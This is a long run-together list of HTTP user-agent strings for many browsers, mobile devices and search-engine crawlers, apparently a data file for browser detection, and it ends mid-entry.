BrowserNG/7.2.7.3 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaN8-00/014.002; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.6.4 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Mozilla/5.0 (SymbianOS 9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 Mozilla/5.0 (SymbianOS/9.1; U; de) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es65 Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es70 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia5700/3.27; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0 Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95/10.0.018; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.3.0.0.0 Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344 Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 SonyEricssonP100/01; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 Safari/525 Mozilla/5.0 (Unknown; U; UNIX BSD/SYSV system; C -) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.2 Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 Mozilla/5.0 (Windows NT 5.2; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2 Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/18.6.872.0 Safari/535.2 UNTRUSTED/1.0 3gpp-gba UNTRUSTED/1.0 Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.29 Safari/537.36 OPR/15.0.1147.24 (Edition Next) Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.27 (KHTML, like Gecko) Chrome/12.0.712.0 Safari/534.27 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.24 Safari/535.1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.36 Safari/535.7 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1092.0 Safari/536.6 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML like Gecko) Maxthon/4.0.0.2000 Chrome/22.0.1229.79 Safari/537.1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/22.0.1207.1 Safari/537.1 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.12 Safari/537.36 OPR/14.0.1116.4 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36 OPR/19.0.1326.56 Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.1; WOW64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20120422 Firefox/12.0 SeaMonkey/2.9 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110622 Firefox/6.0a2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0 Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0 Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3 Mozilla/5.0 (Windows NT 6.2) AppleWebKit/536.6 (KHTML, like Gecko) Chrome/20.0.1090.0 Safari/536.6 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/28.0.1469.0 Safari/537.36 Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36 Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:16.0) Gecko/16.0 Firefox/16.0 Mozilla/5.0 (Windows NT 6.2; rv:19.0) Gecko/20121129 Firefox/19.0 Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0 Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36 OPR/18.0.1284.49 Mozilla/5.0 (Windows; U; ; en-NZ) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.8.0 Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.4) Gecko Netscape/7.1 (ax) Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2 Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610 Minimo/0.016 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; BOLT/2.800) AppleWebKit/534.6 (KHTML, like Gecko) Version/5.0 Safari/534.6.3 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.23) Gecko/20090825 SeaMonkey/1.1.18 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E) Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9pre) Gecko/2008072421 Minefield/3.0.2pre Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11 (.NET CLR 3.5.30729) Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.6 (Change: ) Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.1 (KHTML, like Gecko) Maxthon/3.0.8.2 Safari/533.1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB5 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.17) Gecko/20110123 (like Firefox/3.x) SeaMonkey/2.0.12 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 Mozilla/5.0 (Windows; U; Windows NT 6.2; es-US ) AppleWebKit/540.0 (KHTML like Gecko) Version/6.0 Safari/8900.00 Mozilla/5.0 (Windows; U; Windows XP) Gecko MultiZilla/1.6.1.0a Mozilla/5.0 (WindowsCE 6.0; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11 Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/536.5 (KHTML like Gecko) Chrome/19.0.1084.56 Safari/536.5 Mozilla/5.0 (X11; FreeBSD amd64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4 Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0 Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Fennec/2.0.1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.2 (KHTML, like Gecko) Ubuntu/11.10 Chromium/15.0.874.120 Chrome/15.0.874.120 Safari/535.2 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.22 (KHTML like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22 Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36 Mozilla/5.0 (X11; Linux i686; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 SeaMonkey/2.7.1 Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0 Mozilla/5.0 (X11; Linux i686; rv:12.0) Gecko/20120502 Firefox/12.0 SeaMonkey/2.9.1 Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Iceweasel/14.0.1 Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (X11; Linux i686; rv:2.0b6pre) Gecko/20100907 Firefox/4.0b6pre Mozilla/5.0 (X11; Linux i686; rv:20.0) Gecko/20100101 Firefox/20.0 Mozilla/5.0 (X11; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0 Mozilla/5.0 (X11; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20100101 Firefox/5.0 Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0 Mozilla/5.0 (X11; Linux i686; rv:6.0a2) Gecko/20110615 Firefox/6.0a2 Iceweasel/6.0a2 Mozilla/5.0 (X11; Linux i686; rv:8.0) Gecko/20100101 Firefox/8.0 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.9 Safari/536.5 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.166 Safari/537.36 OPR/20.0.1396.73172 Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4 Mozilla/5.0 (X11; Linux x86_64; en-US; rv:2.0b2pre) Gecko/20100712 Minefield/4.0b2pre Mozilla/5.0 (X11; Linux x86_64; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20120724 Debian Iceweasel/15.02 Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0 Iceweasel/19.0.2 Mozilla/5.0 (X11; Linux x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Mozilla/5.0 (X11; Linux x86_64; rv:2.2a1pre) Gecko/20100101 Firefox/4.2a1pre Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100101 Firefox/5.0 Iceweasel/5.0 Mozilla/5.0 (X11; Linux x86_64; rv:7.0a1) Gecko/20110623 Firefox/7.0a1 Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9 Mozilla/5.0 (X11; U; FreeBSD amd64; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 Mozilla/5.0 (X11; U; FreeBSD i386; de-CH; rv:1.9.2.8) Gecko/20100729 Firefox/3.6.8 Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15 Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16 Mozilla/5.0 (X11; U; FreeBSD; i386; en-US; rv:1.7) Gecko Mozilla/5.0 (X11; U; Linux arm7tdmi; rv:1.8.1.11) Gecko/20071130 Minimo/0.025 Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1 Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020 Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.7.3) Gecko/20040924 Epiphany/1.4.4 (Ubuntu) Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.237.0 Safari/532.4 Debian Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.8 (KHTML, like Gecko) Chrome/4.0.277.0 Safari/532.8 Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040614 Firefox/0.8 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9) Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1) Gecko/20061024 Firefox/2.0 (Swiftfox) Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080716 (Gentoo) Galeon/2.0.6 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060309 Ubuntu/9.10 (karmic) Firefox/3.0.11 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2) Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a3pre) Gecko/20070330 Mozilla/5.0 (X11; U; Linux i686; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.0.5603M Mozilla/5.0 (X11; U; Linux i686; en-us) AppleWebKit/528.5 (KHTML, like Gecko, Safari/528.5 ) lt-GtkLauncher Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.2.3) Gecko/20100406 Firefox/3.6.3 (Swiftfox) Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8 Mozilla/5.0 (X11; U; Linux i686; pt-PT; rv:1.9.2.3) Gecko/20100402 Iceweasel/3.6.3 (like Firefox/3.6.3) GTB7.0 Mozilla/5.0 (X11; U; Linux i686; rv:19.0) Gecko/20100101 Slackware/13 Firefox/19.0 Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.8.1.13) Gecko/20080313 Iceape/1.1.9 (Debian-1.1.9-5) Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Mozilla/5.0 (X11; U; Linux x86_64; en-AU) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IT Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.309.0 Safari/532.9 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.514.0 Safari/534.7 Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML, like Gecko) Ubuntu/10.10 Chrome/9.1.0.0 Safari/540.0 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.3) Gecko/2008092814 (Debian-3.0.1-1) Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.13) Gecko/20100916 Iceape/2.0.8 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.17) Gecko/20110123 SeaMonkey/2.0.12 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20091020 Linux Mint/8 (Helena) Firefox/3.5.3 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5 Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.9) Gecko/20100915 Gentoo Firefox/3.6.9 Mozilla/5.0 (X11; U; Linux x86_64; en-gb) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AP Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/2.9174AT Mozilla/5.0 (X11; U; Linux x86_64; sv-SE; rv:1.8.1.12) Gecko/20080207 Ubuntu/7.10 (gutsy) Firefox/2.0.0.12 Mozilla/5.0 (X11; U; Linux x86_64; us; rv:1.9.1.19) Gecko/20110430 shadowfox/7.0 (like Firefox/7.0 Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527 (KHTML, like Gecko, Safari/419.3) Arora/0.10.1 Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7 Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Epiphany/1.2.5 Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Galeon/1.3.14 Mozilla/5.0 (X11; U; NetBSD amd64; en-US; rv:1.9.2.15) Gecko/20110308 Namoroka/3.6.15 Mozilla/5.0 (X11; U; OpenBSD arm; en-us) AppleWebKit/531.2 (KHTML, like Gecko) Safari/531.2 Epiphany/2.30.0 Mozilla/5.0 (X11; U; OpenBSD i386; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.359.0 Safari/533.3 Mozilla/5.0 (X11; U; OpenBSD i386; en-US; rv:1.9.1) Gecko/20090702 Firefox/3.5 Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.12) Gecko/20080303 SeaMonkey/1.1.8 Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.9.1b3) Gecko/20090429 Firefox/3.1b3 Mozilla/5.0 (X11; U; SunOS sun4m; en-US; rv:1.4b) Gecko/20030517 Mozilla Firebird/0.6 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0 Mozilla/5.0 (compatible; Exabot/3.0; http://www.exabot.com/go/robot) Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) Mozilla/5.0 (compatible; Konqueror/3.3; Linux 2.6.8-gentoo-r3; X11; Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.30-7.dmz.1-liquorix-686; X11) KHTML/3.5.10 (like Gecko) (Debian package 4:3.5.10.dfsg.1-1 b1) Mozilla/5.0 (compatible; Konqueror/3.5; Linux; en_US) KHTML/3.5.6 (like Gecko) (Kubuntu) Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) Mozilla/5.0 (compatible; Konqueror/3.5; SunOS) KHTML/3.5.1 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.1; DragonFly) KHTML/4.1.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.1; OpenBSD) KHTML/4.1.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.2; Linux) KHTML/4.2.4 (like Gecko) Slackware/13.0 Mozilla/5.0 (compatible; Konqueror/4.3; Linux) KHTML/4.3.1 (like Gecko) Fedora/4.3.1-3.fc11 Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu Mozilla/5.0 (compatible; Konqueror/4.4; Linux 2.6.32-22-generic; X11; en_US) KHTML/4.4.3 (like Gecko) Kubuntu Mozilla/5.0 (compatible; Konqueror/4.4; Linux) KHTML/4.4.1 (like Gecko) Fedora/4.4.1-1.fc12 Mozilla/5.0 (compatible; Konqueror/4.5; FreeBSD) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.5; NetBSD 5.0.2; X11; amd64; en_US) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) Mozilla/5.0 (compatible; MSIE 10.6; Windows NT 6.1; Trident/5.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727) 3gpp-gba UNTRUSTED/1.0 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; XBLWP7; ZuneWP7) UCBrowser/2.9.0.263 Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7) Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; Trident/5.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/5.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0) Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html) Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Mozilla/5.0 (compatible; bingbot/2.0 http://www.bing.com/bingbot.htm) Mozilla/5.0 (en-us) AppleWebKit/525.13 (KHTML, like Gecko; Google Web Preview) Version/3.1 Safari/525.13 Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25 Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F) Mozilla/5.0 